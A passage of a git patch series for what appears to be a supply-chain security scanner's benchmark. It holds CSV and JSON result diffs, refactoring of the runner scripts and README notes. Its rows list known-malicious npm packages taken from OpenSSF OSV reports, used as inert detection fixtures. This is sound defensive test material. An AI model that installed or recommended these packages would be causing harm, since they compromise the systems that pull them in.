b9b988a111a6e0915333f4b29ce75fb1fe05f293","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-builder/MAL-2025-190832.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:b9b988a111a6e0915333f4b29ce75fb1fe05f293:6ac5ebe76f27904cfdec2d27badfa7ad53d6f11d","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2024-10692","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2024-10692; report blob 79cb12c286a16d2f04288db57a43bce0b197d907","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-mockadptr/MAL-2024-10692.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:79cb12c286a16d2f04288db57a43bce0b197d907:4a871bf8d97a4ffd916e71d4102e1a09b3d38d6d","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2025-191389","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-191389; report blob 6bae4d1fc6ab36b3516d10c59910f905e50c4f3a","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios-cancelable/MAL-2025-191389.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:6bae4d1fc6ab36b3516d10c59910f905e50c4f3a:5a611b4143b8b29595533761d56448dc59603cd8","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2026-2631","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2026-2631; report blob d20844f3c5e46ef0707cdad324c86ce0b027a8fa","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-plugin-blocks/MAL-2026-2631.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:d20844f3c5e46ef0707cdad324c86ce0b027a8fa:4f055c91abd296b619826fad2bb36752f7f939a7","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2025-47613","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-47613; report blob 3075fa3df8d2b7a89c816127adda2b9188415350","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-ganache/MAL-2025-47613.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:3075fa3df8d2b7a89c816127adda2b9188415350:2aaacc868e3b819e0e9d4dbb9a9d58b5d83906ff","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2026-407","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2026-407; report blob 6bbba35a96333e1960acec15928b07c83544e48a","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-js/MAL-2026-407.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:6bbba35a96333e1960acec15928b07c83544e48a:9897f3726f56deb821827c8de18501abead258f2","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2025-15287","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15287; report blob 910018e9ea790fae8a6c9141550913cf26e5275d","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-npm-install/MAL-2025-15287.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:910018e9ea790fae8a6c9141550913cf26e5275d:8082edb8ce35bdad9a7e5c961b346e42d7d218a3","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2025-15288","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15288; report blob 4a51f824f7203deffb5fd237dc4105ebfbfeba03","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-npm-publish/MAL-2025-15288.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:4a51f824f7203deffb5fd237dc4105ebfbfeba03:c79c0836d3e4e5c0e39da8e406463977b538d0d7","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.3.0","","2026.07.12.003","" +"malicious-osv-mal-2025-3985","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-3985; report blob eb426f1379301192517dbb30aad8a7b4e6993343","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-loader-fs/MAL-2025-3985.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:eb426f1379301192517dbb30aad8a7b4e6993343:655664c120057afcca26233ac537a2622d3d7e2c","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.3.0","","2026.07.12.003","" diff --git a/benchmark/results/post-fix-final.json b/benchmark/results/post-fix-final.json index 6b609c3..35108cd 100644 --- a/benchmark/results/post-fix-final.json +++ b/benchmark/results/post-fix-final.json @@ -1,15 +1,13 @@ { "metadata": { "benchmarkVersion": "0.1.0", - "runAt": "2026-07-13T12:16:34.558Z", - "corpusPath": "/Users/tomas.tilnak/Documents/Codex/2026-07-12/ca/work/flagrix/flagrix-cli/benchmark/corpus.lock.json", - "cliVersion": "0.1.3", - "engineVersion": "0.2.2", - "engineCommitSha": "8c56989d719efb88051d0ac4d319abcdf63649fe", - "engineDirty": true, - "rulesVersion": "2026.07.12.002", - "rulesCommitSha": "193cd4906826ed458976c1f7b9b56bacc09019dd", - "rulesDirty": true + "runAt": "2026-07-13T19:35:54.587Z", + "corpusPath": "/Users/tomas.tilnak/Documents/repos/flagrix-cli/benchmark/corpus.lock.json", + "cliVersion": "0.1.4", + "engineVersion": "0.3.0", + "engineCommitSha": null, + "engineDirty": false, + "rulesVersion": "2026.07.12.003" }, "metrics": { "samplesDefined": 90, @@ -71,7 +69,7 @@ "filesScanned": 1, "filesSkipped": 0, "treeTruncated": false, - "durationMs": 41, + "durationMs": 17, "error": "" }, { @@ -151,7 +149,7 @@ "filesScanned": 1, "filesSkipped": 0, "treeTruncated": false, - "durationMs": 2, + "durationMs": 1, "error": "" }, { @@ -331,7 +329,7 @@ "filesScanned": 1, "filesSkipped": 0, "treeTruncated": false, - "durationMs": 0, + "durationMs": 1, "error": "" }, { @@ -411,7 +409,7 @@ "filesScanned": 1, "filesSkipped": 0, "treeTruncated": false, - "durationMs": 1, + "durationMs": 0, "error": "" }, { @@ -460,7 +458,7 @@ "filesScanned": 1, "filesSkipped": 0, "treeTruncated": false, - "durationMs": 1, + "durationMs": 0, "error": "" }, { @@ -486,7 +484,7 @@ "filesScanned": 1, "filesSkipped": 0, "treeTruncated": false, - "durationMs": 1, + "durationMs": 0, "error": "" }, { @@ -524,7 +522,7 @@ "filesScanned": 1, "filesSkipped": 0, "treeTruncated": false, - "durationMs": 1, + "durationMs": 0, "error": "" }, { @@ -562,7 +560,7 @@ "filesScanned": 1, "filesSkipped": 0, "treeTruncated": false, - "durationMs": 0, + "durationMs": 1, "error": "" }, { @@ -640,7 +638,7 @@ "filesScanned": 151, "filesSkipped": 62, "treeTruncated": false, - "durationMs": 2991, + "durationMs": 4066, "error": "" }, { @@ -688,7 +686,7 @@ "filesScanned": 200, "filesSkipped": 193, "treeTruncated": false, - "durationMs": 3042, + "durationMs": 3701, "error": "" }, { @@ -714,7 +712,7 @@ "filesScanned": 84, "filesSkipped": 27, "treeTruncated": false, - "durationMs": 2215, + "durationMs": 2878, "error": "" }, { @@ -772,7 +770,7 @@ "filesScanned": 200, "filesSkipped": 254, "treeTruncated": false, - "durationMs": 4852, + "durationMs": 3433, "error": "" }, { @@ -943,7 +941,7 @@ "filesScanned": 63, "filesSkipped": 97, "treeTruncated": false, - "durationMs": 5500, + "durationMs": 6133, "error": "" }, { @@ -981,7 +979,7 @@ "filesScanned": 21, "filesSkipped": 13, "treeTruncated": false, - "durationMs": 2281, + "durationMs": 3006, "error": "" }, { @@ -1019,7 +1017,7 @@ "filesScanned": 100, "filesSkipped": 34, "treeTruncated": false, - "durationMs": 2424, + "durationMs": 4427, "error": "" }, { @@ -1045,7 +1043,7 @@ "filesScanned": 27, "filesSkipped": 26, "treeTruncated": false, - "durationMs": 1942, + "durationMs": 2169, "error": "" }, { @@ -1083,7 +1081,7 @@ "filesScanned": 200, "filesSkipped": 7070, "treeTruncated": false, - "durationMs": 4591, + "durationMs": 6000, "error": "" }, { @@ -1139,7 +1137,7 @@ "filesScanned": 200, "filesSkipped": 503, "treeTruncated": false, - "durationMs": 2954, + "durationMs": 3829, "error": "" }, { @@ -1165,7 +1163,7 @@ "filesScanned": 200, "filesSkipped": 8765, "treeTruncated": false, - "durationMs": 3229, + "durationMs": 3898, "error": "" }, { @@ -1191,7 +1189,7 @@ "filesScanned": 200, "filesSkipped": 2513, "treeTruncated": false, - "durationMs": 3436, + "durationMs": 3743, "error": "" }, { @@ -1423,7 +1421,7 @@ "filesScanned": 200, "filesSkipped": 29628, "treeTruncated": false, - "durationMs": 10275, + "durationMs": 10970, "error": "" }, { @@ -1449,7 +1447,7 @@ "filesScanned": 200, "filesSkipped": 1928, "treeTruncated": false, - "durationMs": 3363, + "durationMs": 3382, "error": "" }, { @@ -1553,7 +1551,7 @@ "filesScanned": 200, "filesSkipped": 16247, "treeTruncated": false, - "durationMs": 4734, + "durationMs": 7152, "error": "" }, { @@ -1667,7 +1665,7 @@ "filesScanned": 200, "filesSkipped": 3047, "treeTruncated": false, - "durationMs": 3609, + "durationMs": 4826, "error": "" }, { @@ -1705,7 +1703,7 @@ "filesScanned": 200, "filesSkipped": 6980, "treeTruncated": false, - "durationMs": 4145, + "durationMs": 4879, "error": "" }, { @@ -1761,7 +1759,7 @@ "filesScanned": 200, "filesSkipped": 2849, "treeTruncated": false, - "durationMs": 3442, + "durationMs": 3713, "error": "" }, { @@ -1809,7 +1807,7 @@ "filesScanned": 200, "filesSkipped": 149, "treeTruncated": false, - "durationMs": 3536, + "durationMs": 6114, "error": "" }, { @@ -1835,7 +1833,7 @@ "filesScanned": 200, "filesSkipped": 49533, "treeTruncated": false, - "durationMs": 4251, + "durationMs": 5951, "error": "" }, { @@ -1861,7 +1859,7 @@ "filesScanned": 62, "filesSkipped": 12, "treeTruncated": false, - "durationMs": 2921, + "durationMs": 3599, "error": "" }, { @@ -1936,7 +1934,7 @@ "filesScanned": 200, "filesSkipped": 276, "treeTruncated": false, - "durationMs": 3840, + "durationMs": 6740, "error": "" }, { @@ -1962,7 +1960,7 @@ "filesScanned": 200, "filesSkipped": 952, "treeTruncated": false, - "durationMs": 2662, + "durationMs": 3228, "error": "" }, { @@ -2000,7 +1998,7 @@ "filesScanned": 60, "filesSkipped": 105, "treeTruncated": false, - "durationMs": 3009, + "durationMs": 3170, "error": "" }, { @@ -2093,7 +2091,7 @@ "filesScanned": 200, "filesSkipped": 1703, "treeTruncated": false, - "durationMs": 3523, + "durationMs": 3383, "error": "" }, { @@ -2131,7 +2129,7 @@ "filesScanned": 200, "filesSkipped": 513, "treeTruncated": false, - "durationMs": 3255, + "durationMs": 3894, "error": "" }, { @@ -2157,7 +2155,7 @@ "filesScanned": 87, "filesSkipped": 40, "treeTruncated": false, - "durationMs": 3360, + "durationMs": 2841, "error": "" }, { @@ -2233,7 +2231,7 @@ "filesScanned": 200, "filesSkipped": 655, "treeTruncated": false, - "durationMs": 3192, + "durationMs": 4590, "error": "" }, { @@ -2259,7 +2257,7 @@ "filesScanned": 200, "filesSkipped": 853, "treeTruncated": false, - "durationMs": 3651, + "durationMs": 4233, "error": "" }, { @@ -2297,7 +2295,7 @@ "filesScanned": 200, "filesSkipped": 2151, "treeTruncated": false, - "durationMs": 2969, + "durationMs": 2775, "error": "" }, { @@ -2323,7 +2321,7 @@ "filesScanned": 36, "filesSkipped": 31, "treeTruncated": false, - "durationMs": 2270, + "durationMs": 3410, "error": "" }, { @@ -2381,7 +2379,7 @@ "filesScanned": 200, "filesSkipped": 4471, "treeTruncated": false, - "durationMs": 3593, + "durationMs": 4192, "error": "" }, { @@ -2407,7 +2405,7 @@ "filesScanned": 200, "filesSkipped": 341, "treeTruncated": false, - "durationMs": 3046, + "durationMs": 3223, "error": "" }, { @@ -2463,7 +2461,7 @@ "filesScanned": 200, "filesSkipped": 9125, "treeTruncated": false, - "durationMs": 3497, + "durationMs": 3380, "error": "" }, { @@ -2501,7 +2499,7 @@ "filesScanned": 200, "filesSkipped": 2156, "treeTruncated": false, - "durationMs": 3330, + "durationMs": 3651, "error": "" }, { @@ -2539,7 +2537,7 @@ "filesScanned": 200, "filesSkipped": 4869, "treeTruncated": false, - "durationMs": 3814, + "durationMs": 4244, "error": "" }, { @@ -2654,7 +2652,7 @@ "filesScanned": 200, "filesSkipped": 14300, "treeTruncated": false, - "durationMs": 5578, + "durationMs": 8022, "error": "" }, { @@ -2722,7 +2720,7 @@ "filesScanned": 200, "filesSkipped": 17929, "treeTruncated": false, - "durationMs": 4040, + "durationMs": 5830, "error": "" }, { @@ -2789,7 +2787,7 @@ "filesScanned": 133, "filesSkipped": 948, "treeTruncated": false, - "durationMs": 3368, + "durationMs": 3181, "error": "" }, { @@ -2865,7 +2863,7 @@ "filesScanned": 200, "filesSkipped": 2016, "treeTruncated": false, - "durationMs": 4027, + "durationMs": 3726, "error": "" }, { @@ -3051,7 +3049,7 @@ "filesScanned": 200, "filesSkipped": 53109, "treeTruncated": true, - "durationMs": 7952, + "durationMs": 9514, "error": "" }, { @@ -3107,7 +3105,7 @@ "filesScanned": 200, "filesSkipped": 6701, "treeTruncated": false, - "durationMs": 3841, + "durationMs": 4126, "error": "" }, { @@ -3145,7 +3143,7 @@ "filesScanned": 200, "filesSkipped": 2970, "treeTruncated": false, - "durationMs": 3802, + "durationMs": 3564, "error": "" }, { @@ -3288,7 +3286,7 @@ "filesScanned": 200, "filesSkipped": 5803, "treeTruncated": false, - "durationMs": 6846, + "durationMs": 10282, "error": "" }, { @@ -3314,7 +3312,7 @@ "filesScanned": 200, "filesSkipped": 6874, "treeTruncated": false, - "durationMs": 3404, + "durationMs": 3997, "error": "" }, { @@ -3362,7 +3360,7 @@ "filesScanned": 200, "filesSkipped": 5591, "treeTruncated": false, - "durationMs": 3448, + "durationMs": 4048, "error": "" }, { @@ -3388,7 +3386,7 @@ "filesScanned": 200, "filesSkipped": 432, "treeTruncated": false, - "durationMs": 2634, + "durationMs": 3222, "error": "" }, { @@ -3414,7 +3412,7 @@ "filesScanned": 107, "filesSkipped": 129, "treeTruncated": false, - "durationMs": 2134, + "durationMs": 2986, "error": "" }, { @@ -3536,7 +3534,7 @@ "filesScanned": 200, "filesSkipped": 60050, "treeTruncated": true, - "durationMs": 4744, + "durationMs": 7390, "error": "" }, { @@ -3562,7 +3560,7 @@ "filesScanned": 200, "filesSkipped": 15414, "treeTruncated": false, - "durationMs": 3653, + "durationMs": 5058, "error": "" }, { @@ -3682,7 +3680,7 @@ "filesScanned": 1, "filesSkipped": 0, "treeTruncated": false, - "durationMs": 0, + "durationMs": 1, "error": "" }, { @@ -3812,7 +3810,7 @@ "filesScanned": 1, "filesSkipped": 0, "treeTruncated": false, - "durationMs": 1, + "durationMs": 0, "error": "" }, { @@ -4142,7 +4140,7 @@ "filesScanned": 1, "filesSkipped": 0, "treeTruncated": false, - "durationMs": 1, + "durationMs": 0, "error": "" }, { @@ -4462,7 +4460,7 @@ "filesScanned": 1, "filesSkipped": 0, "treeTruncated": false, - "durationMs": 1, + "durationMs": 0, "error": "" }, { diff --git a/benchmark/run.mjs b/benchmark/run.mjs index bcaa844..296c94d 100644 --- a/benchmark/run.mjs +++ b/benchmark/run.mjs @@ -4,7 +4,7 @@ import { mkdir, readFile, writeFile } from "node:fs/promises" import { dirname, join } from "node:path" import { fileURLToPath } from "node:url" -import { scanGitHubRepo } from "../../flagrix-scanner-core/dist/index.js" +import { scanGitHubRepo } from "@flagrix/scanner-core" const benchmarkDir = dirname(fileURLToPath(import.meta.url)) const projectDir = join(benchmarkDir, "..") @@ -124,20 +124,6 @@ function normalizeSignatures(data) { } } -function gitMetadata(path) { - try { - const sha = execFileSync("git", ["-C", path, "rev-parse", "HEAD"], { - encoding: "utf8", - }).trim() - const dirty = execFileSync("git", ["-C", path, "status", "--porcelain"], { - encoding: "utf8", - }).trim().length > 0 - return { sha, dirty } - } catch { - return { sha: null, dirty: null } - } -} - function resolveGithubToken() { if (process.env.FLAGRIX_GITHUB_TOKEN) return process.env.FLAGRIX_GITHUB_TOKEN try { @@ -557,7 +543,7 @@ function toCsv(results, metadata) { "actual_score", "safe_to_clone", "rules_triggered", "finding_severities", "finding_confidences", "false_positive_notes", "files_scanned", "files_skipped", "tree_truncated", "duration_ms", "engine_version", "engine_commit_sha", - "detection_rules_version", "detection_rules_commit_sha", "error", + "detection_rules_version", "error", ] const rows = results.map((row) => [ row.sampleId, row.corpus, row.label, row.labelSource, row.sourceUrl, row.immutableRef, @@ -568,7 +554,7 @@ function toCsv(results, metadata) { row.findings?.map((finding) => finding.confidence) ?? [], row.falsePositiveNotes, row.filesScanned, row.filesSkipped, row.treeTruncated, row.durationMs, metadata.engineVersion, metadata.engineCommitSha, metadata.rulesVersion, - metadata.rulesCommitSha, row.error, + row.error, ]) return [headers, ...rows].map((row) => row.map(csvCell).join(",")).join("\n") + "\n" } @@ -589,26 +575,27 @@ async function main() { return } + // The engine is whatever `npm install` resolved for @flagrix/scanner-core — + // the same import the runner executes. Metadata must describe that artifact, + // not a sibling checkout that may be dirty or on a different commit. const [{ corpus, path: corpusPath }, rawSignatures, corePackage, cliPackage] = await Promise.all([ loadCorpus(), readJson(join(projectDir, "assets", "signatures-snapshot.json")), - readJson(join(projectDir, "..", "flagrix-scanner-core", "package.json")), + readJson(join(projectDir, "node_modules", "@flagrix/scanner-core", "package.json")), readJson(join(projectDir, "package.json")), ]) const signatures = normalizeSignatures(rawSignatures) - const engineGit = gitMetadata(join(projectDir, "..", "flagrix-scanner-core")) - const rulesGit = gitMetadata(join(projectDir, "..", "flagrix-detection-rules")) const metadata = { benchmarkVersion: corpus.benchmarkVersion, runAt: new Date().toISOString(), corpusPath, cliVersion: cliPackage.version, engineVersion: corePackage.version, - engineCommitSha: engineGit.sha, - engineDirty: engineGit.dirty, + // npm strips gitHead from some publishes; null means "as published on the + // registry at engineVersion", which is already immutable. + engineCommitSha: corePackage.gitHead ?? null, + engineDirty: false, rulesVersion: signatures.version, - rulesCommitSha: rulesGit.sha, - rulesDirty: rulesGit.dirty, } let samples = corpus.samples From 64f16024e1973120bd24d3824889ddfd0b5755f4 Mon Sep 17 00:00:00 2001 From: Tomas Tilnak <14878713+tiltom@users.noreply.github.com> Date: Mon, 13 Jul 2026 22:42:20 +0200 Subject: [PATCH 4/4] chore: benchmark cleanups from review MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - extract shared sample constructors into benchmark/samples.mjs — run.mjs and pin-corpus.mjs previously duplicated projectSample/osvSample and corpus expansion, so the pinner and runner could drift apart silently (verified: expanded corpus reproduces the committed lock exactly, 90/90 sampleIds and fixture contents) - gitignore only ad-hoc results; canonical snapshots (pre-fix-baseline.*, post-fix-final.*) are exempted so updating them never needs git add -f - README: state that the known-malicious-metadata gate measures signature coverage of the pinned OSV samples, not generalizing recall; behavioral generalization is the critical fixtures' job - comment the prefetch's mirrored scanner-core selection constants: drift is correctness-safe (REST fallback), re-sync on dependency bumps --- .gitignore | 9 ++++++- benchmark/README.md | 12 ++++++++++ benchmark/pin-corpus.mjs | 43 +++------------------------------ benchmark/run.mjs | 52 +++++++--------------------------------- benchmark/samples.mjs | 52 ++++++++++++++++++++++++++++++++++++++++ 5 files changed, 84 insertions(+), 84 deletions(-) create mode 100644 benchmark/samples.mjs diff --git a/.gitignore b/.gitignore index 6b75e85..765dc42 100644 --- a/.gitignore +++ b/.gitignore @@ -2,4 +2,11 @@ node_modules/ dist/ *.tgz .DS_Store -benchmark/results/ +# Ad-hoc benchmark outputs stay local; canonical committed snapshots +# (pre-fix-baseline.*, post-fix-final.*) are exempted so updating them never +# needs `git add -f`. +benchmark/results/* +!benchmark/results/pre-fix-baseline.json +!benchmark/results/pre-fix-baseline.csv +!benchmark/results/post-fix-final.json +!benchmark/results/post-fix-final.csv diff --git a/benchmark/README.md b/benchmark/README.md index 3458e3c..dcc6ce5 100644 --- a/benchmark/README.md +++ b/benchmark/README.md @@ -49,6 +49,10 @@ Outputs are written to `benchmark/results/`: - `latest.json`: complete structured run and aggregate metrics - `latest.csv`: flat, spreadsheet-friendly sample results +Ad-hoc outputs are gitignored; only the canonical snapshots +(`pre-fix-baseline.*`, `post-fix-final.*`) are tracked. To update a canonical +snapshot, copy `latest.json`/`latest.csv` over it and commit. + ## Corpus semantics `reference-clean` means a project selected as a false-alarm reference at one @@ -56,6 +60,14 @@ specific commit. It is not a claim that the project is vulnerability-free or benign forever. Any High/Critical finding requires manual review and a note in the result workbook before it is classified as a false positive. +`known-malicious-metadata` measures **signature coverage, not generalizing +recall**: every OSV package in the corpus is also present in the bundled +signature snapshot, so the 100% detection rate proves the dependency-matching +pipeline works end-to-end against independently labeled samples — it does not +predict detection of malware absent from the rules list. Detection of unseen +malicious *behavior* is exercised separately by the critical fixtures, which +match behavioral rules rather than package names. + Launch-gate defaults: - 100% of critical fixtures detected in the expected category diff --git a/benchmark/pin-corpus.mjs b/benchmark/pin-corpus.mjs index abfd0af..9d2736d 100644 --- a/benchmark/pin-corpus.mjs +++ b/benchmark/pin-corpus.mjs @@ -4,6 +4,8 @@ import { readFile, writeFile } from "node:fs/promises" import { dirname, join } from "node:path" import { fileURLToPath } from "node:url" +import { expandCorpus } from "./samples.mjs" + const benchmarkDir = dirname(fileURLToPath(import.meta.url)) const sourcePath = join(benchmarkDir, "corpus.json") const outputPath = join(benchmarkDir, "corpus.lock.json") @@ -68,22 +70,7 @@ async function main() { const additions = JSON.parse(additionsText) const osvText = await readFile(join(benchmarkDir, "osv-malicious-packages.json"), "utf8") const osv = JSON.parse(osvText) - corpus.samples.push(...additions.projects.map((project) => { - const prefix = project.corpus === "noisy-legitimate" ? "noisy" : "reference" - const slug = project.repo.toLowerCase().replaceAll("/", "-").replaceAll(".", "-") - return { - sampleId: `${prefix}-${slug}`, - corpus: project.corpus, - label: "reference-clean", - labelSource: "Expanded commit-pinned reference corpus", - sourceUrl: `https://github.com/${project.repo}`, - immutableRef: null, - maximumExpectedVerdict: "low", - expectedDetectionCategories: [], - target: { kind: "github", repo: project.repo, ref: null }, - } - })) - corpus.samples.push(...osv.packages.map((entry) => osvSample(osv.source, entry))) + expandCorpus(corpus, additions, osv) for (const sample of corpus.samples) { if (sample.target.kind !== "github") continue if (/^[0-9a-f]{40}$/i.test(sample.target.ref ?? "")) continue @@ -111,30 +98,6 @@ async function main() { console.log(outputPath) } -function osvSample(source, entry) { - const reportPath = `osv/malicious/${source.ecosystem}/${entry.name}/${entry.reportId}.json` - return { - sampleId: `malicious-osv-${entry.reportId.toLowerCase()}`, - corpus: "real-malicious", - label: "known-malicious-metadata", - labelSource: `OpenSSF OSV ${entry.reportId}; report blob ${entry.reportBlobSha}`, - sourceUrl: `https://github.com/${source.repository}/blob/${source.commit}/${reportPath}`, - immutableRef: `osv:${source.commit}:${entry.reportBlobSha}`, - expectedDetectionCategories: ["SUSPICIOUS_DEPENDENCY"], - minimumExpectedVerdict: "high", - target: { - kind: "fixture", - files: { - "package.json": JSON.stringify({ - name: `flagrix-inert-${entry.reportId.toLowerCase()}`, - private: true, - dependencies: { [entry.name]: entry.version }, - }) + "\n", - }, - }, - } -} - main().catch((error) => { console.error(`benchmark:pin: ${error instanceof Error ? error.message : error}`) process.exitCode = 1 diff --git a/benchmark/run.mjs b/benchmark/run.mjs index 296c94d..fd6e11e 100644 --- a/benchmark/run.mjs +++ b/benchmark/run.mjs @@ -6,6 +6,8 @@ import { fileURLToPath } from "node:url" import { scanGitHubRepo } from "@flagrix/scanner-core" +import { expandCorpus } from "./samples.mjs" + const benchmarkDir = dirname(fileURLToPath(import.meta.url)) const projectDir = join(benchmarkDir, "..") const resultsDir = join(benchmarkDir, "results") @@ -15,6 +17,12 @@ const SHA_PATTERN = /^[0-9a-f]{40}$/i const VERDICT_RANK = { low: 0, medium: 1, high: 2 } const GITHUB_GRAPHQL_BATCH_SIZE = 50 const NPM_PREFETCH_CONCURRENCY = 12 +// Mirror of the file-selection rules in @flagrix/scanner-core's repo-scanner +// (PRIORITY_FILES / SCANNABLE_EXTENSIONS / MAX_FILES_TO_SCAN / +// MAX_FILE_SIZE_BYTES) — used only to decide which blobs the GraphQL prefetch +// warms. Drift is safe for correctness: files the scanner wants but the +// prefetch skipped fall through to plain REST fetches; extra prefetched files +// are ignored. Re-sync when bumping the scanner-core dependency. const GITHUB_MAX_FILES = 200 const GITHUB_MAX_FILE_SIZE = 1024 * 1024 const GITHUB_PRIORITY_FILES = [ @@ -67,49 +75,7 @@ async function loadCorpus() { const corpus = await readJson(SOURCE_CORPUS) const additions = await readJson(join(benchmarkDir, "github-projects.json")) const osv = await readJson(join(benchmarkDir, "osv-malicious-packages.json")) - corpus.samples.push(...additions.projects.map(projectSample)) - corpus.samples.push(...osv.packages.map((entry) => osvSample(osv.source, entry))) - return { corpus, path: SOURCE_CORPUS } - } -} - -function osvSample(source, entry) { - const reportPath = `osv/malicious/${source.ecosystem}/${entry.name}/${entry.reportId}.json` - return { - sampleId: `malicious-osv-${entry.reportId.toLowerCase()}`, - corpus: "real-malicious", - label: "known-malicious-metadata", - labelSource: `OpenSSF OSV ${entry.reportId}; report blob ${entry.reportBlobSha}`, - sourceUrl: `https://github.com/${source.repository}/blob/${source.commit}/${reportPath}`, - immutableRef: `osv:${source.commit}:${entry.reportBlobSha}`, - expectedDetectionCategories: ["SUSPICIOUS_DEPENDENCY"], - minimumExpectedVerdict: "high", - target: { - kind: "fixture", - files: { - "package.json": JSON.stringify({ - name: `flagrix-inert-${entry.reportId.toLowerCase()}`, - private: true, - dependencies: { [entry.name]: entry.version }, - }) + "\n", - }, - }, - } -} - -function projectSample(project) { - const prefix = project.corpus === "noisy-legitimate" ? "noisy" : "reference" - const slug = project.repo.toLowerCase().replaceAll("/", "-").replaceAll(".", "-") - return { - sampleId: `${prefix}-${slug}`, - corpus: project.corpus, - label: "reference-clean", - labelSource: "Expanded commit-pinned reference corpus", - sourceUrl: `https://github.com/${project.repo}`, - immutableRef: null, - maximumExpectedVerdict: "low", - expectedDetectionCategories: [], - target: { kind: "github", repo: project.repo, ref: null }, + return { corpus: expandCorpus(corpus, additions, osv), path: SOURCE_CORPUS } } } diff --git a/benchmark/samples.mjs b/benchmark/samples.mjs new file mode 100644 index 0000000..4bf91bc --- /dev/null +++ b/benchmark/samples.mjs @@ -0,0 +1,52 @@ +/** + * Shared corpus-sample constructors for run.mjs and pin-corpus.mjs. + * Both scripts must expand the source corpus identically, or the runner would + * evaluate samples the pinner never locked (and vice versa). + */ + +export function projectSample(project) { + const prefix = project.corpus === "noisy-legitimate" ? "noisy" : "reference" + const slug = project.repo.toLowerCase().replaceAll("/", "-").replaceAll(".", "-") + return { + sampleId: `${prefix}-${slug}`, + corpus: project.corpus, + label: "reference-clean", + labelSource: "Expanded commit-pinned reference corpus", + sourceUrl: `https://github.com/${project.repo}`, + immutableRef: null, + maximumExpectedVerdict: "low", + expectedDetectionCategories: [], + target: { kind: "github", repo: project.repo, ref: null }, + } +} + +export function osvSample(source, entry) { + const reportPath = `osv/malicious/${source.ecosystem}/${entry.name}/${entry.reportId}.json` + return { + sampleId: `malicious-osv-${entry.reportId.toLowerCase()}`, + corpus: "real-malicious", + label: "known-malicious-metadata", + labelSource: `OpenSSF OSV ${entry.reportId}; report blob ${entry.reportBlobSha}`, + sourceUrl: `https://github.com/${source.repository}/blob/${source.commit}/${reportPath}`, + immutableRef: `osv:${source.commit}:${entry.reportBlobSha}`, + expectedDetectionCategories: ["SUSPICIOUS_DEPENDENCY"], + minimumExpectedVerdict: "high", + target: { + kind: "fixture", + files: { + "package.json": JSON.stringify({ + name: `flagrix-inert-${entry.reportId.toLowerCase()}`, + private: true, + dependencies: { [entry.name]: entry.version }, + }) + "\n", + }, + }, + } +} + +/** Append the github-projects and OSV samples to the source corpus in place. */ +export function expandCorpus(corpus, additions, osv) { + corpus.samples.push(...additions.projects.map(projectSample)) + corpus.samples.push(...osv.packages.map((entry) => osvSample(osv.source, entry))) + return corpus +}